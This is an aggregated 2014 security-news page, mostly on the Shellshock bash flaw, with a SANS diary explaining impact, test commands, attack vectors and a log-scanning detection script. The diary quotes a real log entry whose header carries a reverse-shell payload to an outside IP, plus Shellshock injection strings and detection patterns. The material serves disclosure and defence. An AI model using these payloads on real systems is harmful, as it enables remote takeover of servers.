Hackin9

Richard Porter --- ISC Handler on Duty

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Wireshark SES Dissector CVE-2014-6428 Remote Denial of Service Vulnerability
 
 
Wireshark MEGACO Dissector CVE-2014-6423 Remote Denial of Service Vulnerability
 
Wireshark Sniffer File CVE-2014-6431 Remote Denial of Service Vulnerability
 
Wireshark Netflow Dissector CVE-2014-6424 Denial of Service Vulnerability
 
Wireshark RTSP Dissector CVE-2014-6427 Remote Denial of Service Vulnerability
 

I created a quick YouTube video to summarize the impact of the vulnerability. The tricky part is that there is a huge vulnerable population out there, but the impact is limited, since in most cases the vulnerability is not exposed.

Feel free to share the video or the slides. I am making PPT and PDF versions available below.

PDF Version of Slides
PPT Version of Slides (coming soon. not uploaded yet)

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

 

Shellshock Bash bug patch is buggy: Infosec bods warn MILLIONS of systems ...
Register
A security patch for the severe Shellshock vulnerability in Bash is incomplete – as hackers exploit the hole to compromise computers. The flaw affects the GNU Bourne Again Shell – better known as Bash – which is a command interpreter used by many Linux ...

 
LibVNCServer CVE-2014-6053 Remote Denial of Service Vulnerability
 
LibVNCServer CVE-2014-6054 Denial of Service Vulnerability
 
libVNCserver CVE-2014-6051 Integer Overflow Vulnerability
 
Dubbed "Shellshock," the vulnerability is already being exploited by what looks to be a web server botnet.

The vulnerability reported in the GNU Bourne Again Shell (Bash) yesterday, dubbed "Shellshock," may already have been exploited in the wild to take over Web servers as part of a botnet. More security experts are now weighing in on the severity of the bug, expressing fears that it could be used for an Internet "worm" to exploit large numbers of public Web servers. And the initial fix for the issue still left Bash vulnerable to attack, according to a new US CERT National Vulnerability Database entry. A second vulnerability in Bash allows for an attacker to overwrite files on the targeted system.

Update: The vulnerability was addressed by the maintainer of Bash, Chet Ramey, in an email to the Open Source Software Security (oss-sec) mailing list. An unofficial patch that fixes the problem has been developed, but there is as of yet no official patch that completely addresses both vulnerabilities.

In a blog post yesterday, Robert Graham of Errata Security noted that someone is already using a massive Internet scan to locate vulnerable servers for attack. In a brief scan, he found over 3,000 servers that were vulnerable "just on port 80"—the Internet Protocol port used for normal Web Hypertext Transfer Protocol (HTTP) requests. And his scan broke after a short period, meaning that there could be vast numbers of other servers vulnerable. A Google search by Ars using advanced search parameters yielded over two billion webpages that at least partially fit the profile for the Shellshock exploit.


 

A London-based security researcher made multiple reports to Apple that the company's iCloud service was vulnerable to brute-force password attacks months before the revelations that celebrities' iCloud backups were mined for intimate photos and videos. The Daily Dot reports that Ibrahim Balic sent descriptions of the vulnerability to Apple in March in addition to filing a report that the system leaked user data that could be used to mount such attacks. Balic attempted to reach out both via e-mail and through the company's Web-based bug reporting system.

In an e-mail dated March 26, Balic told an Apple employee:

I found a new issue regarding on Apple accounts (sic)...By the brute force attack method I can try over 20,000 + times passwords on any accounts. I think account lockout should probably be applied. I'm attaching a screen shot for you. I found the same issue with Google and I have got my response from them.

The Apple employee responded, "It's good to hear from you. Thank you for the information."


 
GNU Bash CVE-2014-7169 Incomplete Fix Remote Code Execution Vulnerability
 
Cisco Unified Communications Manager GNU C Library Local Heap Based Buffer Overflow Vulnerability
 
LinuxSecurity.com: New mozilla-nss packages are available for Slackware 14.0, 14.1, and -current to fix a security issue. [More Info...]
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: A parsing flaw related to functions and environments in Bash could allow attackers to inject code.
 
LinuxSecurity.com: Fraudulent security certificates could allow sensitive information to be exposed when accessing the Internet.
 
LinuxSecurity.com: A parsing flaw related to functions and environments in Bash could allow attackers to inject code. The unaffected packages listed in GLSA 201409-09 had an incomplete fix.
 
LinuxSecurity.com: A vulnerability has been discovered and corrected in Mozilla NSS: Antoine Delignat-Lavaud, security researcher at Inria Paris in team Prosecco, reported an issue in Network Security Services (NSS) libraries affecting all versions. He discovered that NSS is vulnerable [More...]
 
LinuxSecurity.com: Updated wireshark packages fix security vulnerabilities: RTP dissector crash (CVE-2014-6421, CVE-2014-6422). MEGACO dissector infinite loop (CVE-2014-6423). [More...]
 
LinuxSecurity.com: Updated curl packages fix security vulnerabilities: In cURL before 7.38.0, libcurl can be fooled to both sending cookies to wrong sites and into allowing arbitrary sites to set cookies for others. For this problem to trigger, the client application must use [More...]
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue. [More Info...]
 
QEMU 'pcihp.c' Out of Bounds Memory Corruption Vulnerability
 
[oCERT-2014-007] libvncserver multiple issues
 

Apple's latest iPhones are vulnerable to the same fingerprint forging attack as the older iPhone 5S, allowing access to the phone via a fingerprint fabricated with some specialized knowledge and materials costing less than a thousand dollars, according to a researcher who reproduced the attack against the latest iPhones.

Mark Rogers, principal security researcher for mobile security firm Lookout, used techniques common to law enforcement investigators and prototypers to first lift latent prints from the device and then create a mold from a custom circuit-board kit. Then, using glue, he made a thin rubber print that he placed over his thumb, fooling the Touch ID sensor on the latest iPhones.

While his experiments suggested that Apple improved the sensor on the latest iPhones—it rejected slightly fewer legitimate prints and slightly more fake prints—Rogers found that the technique still works on the iPhone 6 and 6 Plus.


 
LSE Leading Security Experts GmbH - LSE-2014-06-10 - Perl CORE - Deep Recursion Stack Overflow
 
[ MDVSA-2014:189 ] nss
 
[ MDVSA-2014:188 ] wireshark
 
[ MDVSA-2014:187 ] curl
 
[SECURITY] [DSA 3033-1] nss security update
 
[security bulletin] HPSBST03103 rev.1 - HP Storage EVA Command View Suite running OpenSSL, Remote Unauthorized Access, Disclosure of Information
 
Re: [FD] Strength and Weakness of Methods to Confirm SSH Host Key
 
[ MDVSA-2014:186 ] bash
 

Announcement from the FSF

https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability

Resources (will be updated)

DHCP Proof Of Concept
https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/

Dr. Chaos's Blog about ShellShock
http://www.drchaos.com/shellshock-22-year-internet-vulnerability-could-be-the-biggest-yet/

F5 BIG-IP Exploit Example
https://twitter.com/ashk4n/status/515121090688196609

F5 DEVCentral on ShellShock
https://devcentral.f5.com/articles/cve-2014-6271-shellshocked


Testing OSX and Patching Bash Yourself
http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-shellshock-the-remote-exploit-cve-2014-6271-an/146851#146851

Ubuntu Patch Notes for ShellShock
http://www.ubuntu.com/usn/usn-2363-1/

 

Yesterday, a vulnerability in bash was announced that was originally found by Stéphane Chazelas. The vulnerability allows for arbitrary code execution in bash by setting specific environment variables. Later, Tavis Ormandy released a second exploit that works on patched systems, demonstrating that the patch released yesterday is incomplete.

What is the impact of the vulnerability?

At first, the vulnerability doesn't look all that serious. Executing commands is what bash is used for. But in this case, code can be executed without the user's intent by setting an environment variable.

The most problematic scenario is bash scripts executed via cgi-bin. The CGI specification requires the web server to convert HTTP request headers supplied by the client to environment variables. If a bash script is called via cgi-bin, an attacker may use this to execute code as the web server.

Other, less likely scenarios involve ssh, which can set environment variables, but they would have to be set on the server in a configuration file. DHCP clients may in some cases execute bash scripts and use environment variables supplied by the server. This case may be exploitable if the user connects to an untrusted DHCP server ("coffeehouse wifi").

Should I apply the patch?

Yes. The patch fixes one aspect of the vulnerability, but it is not complete and does not close the vulnerability entirely. We are not aware of any side effects of the patch.

What are my other options? What else should I do?

Since the patch is incomplete, you should implement additional measures to protect your systems. Various Intrusion Detection System (IDS) and Web Application Firewall (WAF) vendors have released rules to block exploitation. Realize that these rules may be incomplete as well. Many rules I have seen so far just look for the string "() {", which was present in the original proof of concept exploit but could easily be changed, for example by adding more or different white space.
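To make the gap in such rules concrete, here is an added example (not from the ISC diary) that runs a literal "() {" match and a whitespace-tolerant match over a constructed access log. The first log line is the entry quoted later in this diary; the remaining lines, the 192.0.2.x addresses and the "echo probe" header values are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the ISC diary: compare the literal "() {" match
# used by many early IDS/WAF rules with a whitespace-tolerant pattern over
# web-server access-log lines.

# Constructed sample log. The first line is the entry quoted in the diary;
# the next two are constructed variants of the same header with the spacing
# changed, and the last is an ordinary browser request.
SAMPLE_LOG='178.86.28.56 - - [25/Sep/2014:21:24:54 +0000] "GET /iscfavicon.ico HTTP/1.1" 200 1406 "-" "() { :; }; bash -i >& /dev/tcp/178.86.28.56/9999 0>&1" "-"
192.0.2.10 - - [25/Sep/2014:21:30:00 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" "(){ :;}; echo probe" "-"
192.0.2.11 - - [25/Sep/2014:21:31:00 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" "()  {  :; }; echo probe" "-"
192.0.2.12 - - [25/Sep/2014:21:32:00 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)" "-"'

# Tolerant pattern: any run of spaces or tabs between "(", ")" and "{".
TOLERANT='\([[:blank:]]*\)[[:blank:]]*\{'

# Number of lines containing the literal string many early rules looked for.
count_naive() {
    printf '%s\n' "$SAMPLE_LOG" | grep -c -F '() {'
}

# Number of lines matching the whitespace-tolerant pattern.
count_tolerant() {
    printf '%s\n' "$SAMPLE_LOG" | grep -c -E "$TOLERANT"
}

# Source addresses of the lines flagged by the tolerant pattern, one per
# line, for hand-off to blocking or further investigation.
flagged_sources() {
    printf '%s\n' "$SAMPLE_LOG" | grep -E "$TOLERANT" | awk '{ print $1 }' | sort -u
}

echo "literal '() {' matches:   $(count_naive)"
echo "whitespace-tolerant hits: $(count_tolerant)"
echo "flagged sources:"
flagged_sources
```

The literal match catches only the diary's log line; the tolerant pattern catches all three probes and still ignores the browser User-Agent, whose "(X11;" never closes the parentheses before the brace. Even the tolerant pattern is a signal rather than a fix: it only inspects the plain-text log, so treat a hit as a reason to check the host, and rely on patching, not on the rule, to close the hole.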

You could switch your default shell to an alternative like ksh or sh. But this will likely break existing scripts, because different shells use slightly different syntax.

On many embedded systems you may already use an alternative shell ("busybox") that is not vulnerable. 

How do I find vulnerable systems?

If you can log on to the system you can use one of these test strings:

To check if you are patched, you can use the original test string:

env x='() { :;}; echo vulnerable' sh -c "echo this is a test"

If you are patched, but want to demonstrate that you are still vulnerable, you can use this command:

env X='() { (a)=>\' sh -c "echo date";

This command will return an error on a patched system, but it will still create an empty file called "echo".

There are various modules for vulnerability scanners to search for vulnerable systems. You can also use a quick Google search for likely vulnerable web servers:
filetype:sh inurl:cgi-bin site:[your domain]
This Google check may return shell scripts that use shells other than bash.

Be careful to check web servers in embedded systems like routers, as they may not only run bash scripts, but may do so at elevated privileges. Many embedded systems use busybox, not bash, and are safe. But if bash is used, these systems may be vulnerable.

Are systems already being exploited?

We have seen reports of scans for the vulnerability. The cgi-bin exploit is used very aggressively, and we have already seen multiple attacks against our own web servers.

How is exploitation happening?

There are currently 3 different avenues that are being explored as most likely to expose the vulnerability:

HTTP: cgi-bin scripts using bash. They do not necessarily have to use a /cgi-bin/ URL. Different directories can be configured to expose scripts to cgi-bin. This vulnerability is also not limited to Apache. We do see numerous exploit attempts against our own (non-vulnerable) web servers, and are receiving many reports of exploit attempts. For example, here is a log entry in which the User-Agent was set to the exploit value:

178.86.28.56 - - [25/Sep/2014:21:24:54 +0000] "GET /iscfavicon.ico HTTP/1.1" 200 1406 "-" "() { :; }; bash -i >& /dev/tcp/178.86.28.56/9999 0>&1" "-"

DHCP: This exploit vector is a tad harder to reach, but can attack clients as well as servers. In Linux, the DHCP client sets environment variables based on data supplied by the DHCP server. The client then calls various bash scripts to adjust the network configuration. A malicious DHCP server may provide crafted data that will then lead to code execution via the bash vulnerability. This is particularly critical as these scripts are executed as root.

SSH: In ssh, the user may set environment variables when connecting to an ssh server. These can then be used to bypass shell restrictions imposed on the user.

 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

 
Torque 'send_the_mail()' Function Remote Command Injection Vulnerability
 
Cisco Security Advisory: Cisco IOS Software Network Address Translation Denial of Service Vulnerability
 
Cisco Security Advisory: Cisco IOS Software DHCP Version 6 Denial of Service Vulnerability
 
Cisco Security Advisory: Cisco IOS Software Metadata Vulnerabilities
 
Cisco Security Advisory: Cisco IOS Software RSVP Vulnerability
 
[ MDVSA-2014:185 ] libgadu
 
[ MDVSA-2014:183 ] phpmyadmin
 
[ MDVSA-2014:181 ] dump
 
[SECURITY] [DSA 3032-1] bash security update
 